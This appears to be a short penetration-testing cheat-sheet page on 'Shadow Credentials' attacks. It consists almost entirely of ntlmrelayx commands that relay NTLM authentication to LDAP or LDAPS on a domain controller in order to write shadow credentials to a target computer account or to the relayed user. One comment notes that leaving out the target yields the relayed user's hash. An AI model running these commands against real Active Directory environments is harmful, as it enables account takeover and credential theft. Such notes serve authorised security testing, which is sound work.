Shadow Credentials
Last updated
# Relaying will work against either LDAP or LDAPS
# LDAPS
ntlmrelayx -t ldaps://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'
# LDAP
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'
## Failing to specify the --shadow-target will attempt to obtain a hash for the relayed user.
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials